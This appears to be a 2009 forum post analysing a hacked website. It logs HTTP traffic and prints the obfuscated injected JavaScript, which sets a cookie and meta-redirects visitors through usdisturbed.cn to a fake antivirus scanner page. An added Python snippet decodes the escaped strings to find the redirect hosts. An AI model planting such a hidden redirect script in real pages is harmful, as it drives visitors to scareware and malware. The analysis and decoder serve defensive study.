Sent headers:
GET / HTTP/1.1
Accept: application/x-silverlight, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: phpromania.net
Connection: Keep-Alive
Cookie: __utma=217314775.209756747.1253141400.1253141400.1253141400.1; __utmb=217314775; __utmz=217314775.1253141400.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Received headers:
HTTP/1.0 200 OK
Date: Tue, 15 Sep 2009 18:17:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Content-Length: 731
Connection: Keep-Alive
Received content:
<script type="text/javascript" language="javascript">var hqrwa=new Date();hqrwa.setTime(hqrwa.getTime()+014*074*074*01750);document.cookie="\x6e_s\x65\x73\x73_\x69d\x3d\x63\x643f\x63\x34\x63\x66e\x39700ee\x30de\x34b\x35\x65c\x39\x340\x30c38e\x38"+"\x3b\x20pat\x68\075\x2f; \x65xpir\x65s="+hqrwa.toGMTString();</script> <script type="text/javascript" language="javascript">var bgpo=new Array("\x68\x74\x74p\x3a\x2f\x2fus\x64\x69s\x74\x75\x72\x62ed.\x63\x6e\x2f\x3f\x70\x69\x64\x3d\x318\x30\x73\x30\x31&si\x64\x3d\x33\x635\x37\x379");var elitzp="ca,co,\x64\x61,de\x2ccy,el\x2cen,e\x6f,es\x2cfi\x2cfr,\x67a,\x69t\x2cja\x2cji\x2ck\x6e,n\x6c,\x6eo,\x70t,\x73v";var ypukog=navigator.language||navigator.systemLanguage;var lang=ypukog.toLowerCase();lang=lang.substr(0,2);if(elitzp.indexOf(lang)==-1){fcok();}else{var rpygwij=Math.floor(Math.random()*bgpo.length);pynidzq(bgpo[rpygwij]);}function pynidzq(ygmxwhh){document.writeln("\x3cME\x54\x41 H\x54TP-EQU\x49V=\047Re\x66res\x68\047\x20\x43ONT\x45N\x54=\0470;\x20UR\x4c="+ygmxwhh+"\047\x3e");document.writeln("\x3cmeta \x68\x74t\x70\055\x65quiv\x3d\047\x70r\x61gma\x27 c\x6fnt\x65nt\x3d\047no-\x63a\x63h\x65\047\076");document.writeln("\074meta na\x6d\145\x3d\047\x72ob\x6fts\047 con\x74en\x74=\047noi\x6ede\x78,n\x6ff\x6fll\x6fw\x27>");}function fcok(){return;}</script>
From the code above you will see that a cookie is set, which probably helps them later to verify who you are, and a meta redirect is written to HOST: usdisturbed.cn
Virus sent headers:
GET /?pid=180s01&sid=3c5779 HTTP/1.1
Accept: application/x-silverlight, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: usdisturbed.cn
Connection: Keep-Alive
Virus received headers:
HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Sep 2009 21:21:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: red=1; expires=Thu, 17-Sep-2009 21:21:24 GMT
Location: http://delete-all-virus05.com/scan1/?pi ... UxMMMOPAhN
Content-Type: text/html
Connection: close
Partial content of the virus page:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>My computer On-line Scanner</title>
I suggest you check the sources, run a scan, investigate, and I am curious what you will find. If you get nowhere, change the host.
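
The injected script quoted in the post hides its strings behind \xHH and octal escapes. This added example (not part of the original post) decodes such literals statically, without running the script, and lists the hosts it redirects to. The function names are hypothetical, and only double-quoted literals are handled.

```python
import re
from urllib.parse import urlsplit

# Two statements copied from the injected script quoted in the post.
SAMPLE = r'''
var bgpo=new Array("\x68\x74\x74p\x3a\x2f\x2fus\x64\x69s\x74\x75\x72\x62ed.\x63\x6e\x2f\x3f\x70\x69\x64\x3d\x318\x30\x73\x30\x31&si\x64\x3d\x33\x635\x37\x379");
document.writeln("\x3cME\x54\x41 H\x54TP-EQU\x49V=\047Re\x66res\x68\047\x20\x43ONT\x45N\x54=\0470;\x20UR\x4c="+ygmxwhh+"\047\x3e");
'''

# JavaScript escapes: \xHH, \uHHHH, legacy octal (three digits only when the
# first is 0-3, so the value stays <= \377), or any other escaped character.
ESCAPE = re.compile(
    r'\\(?:x([0-9A-Fa-f]{2})|u([0-9A-Fa-f]{4})|([0-3][0-7]{0,2}|[4-7][0-7]?)|(.))',
    re.S)
STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')      # double-quoted literals only
URL = re.compile(r"https?://[^\s'\"<>]+")


def decode_literal(body):
    """Resolve the escapes inside one string-literal body."""
    def repl(m):
        hex2, hex4, octal, other = m.groups()
        if hex2 or hex4:
            return chr(int(hex2 or hex4, 16))
        if octal:
            return chr(int(octal, 8))
        # \" \' \\ collapse to the character; \n, \t etc. are left as written.
        return other if other in '"\'\\' else m.group(0)
    return ESCAPE.sub(repl, body)


def decoded_strings(script):
    """Every double-quoted literal in the script, with escapes resolved."""
    return [decode_literal(m.group(1)) for m in STRING.finditer(script)]


def redirect_hosts(script):
    """Hosts of all http(s) URLs found in the decoded literals."""
    hosts = {urlsplit(u).hostname
             for s in decoded_strings(script) for u in URL.findall(s)}
    return sorted(hosts)


if __name__ == "__main__":
    for s in decoded_strings(SAMPLE):
        print(repr(s))
    print("redirect hosts:", redirect_hosts(SAMPLE))
```

The same functions can be run over a saved copy of a suspect page to find every file on the site that carries a redirect like this one.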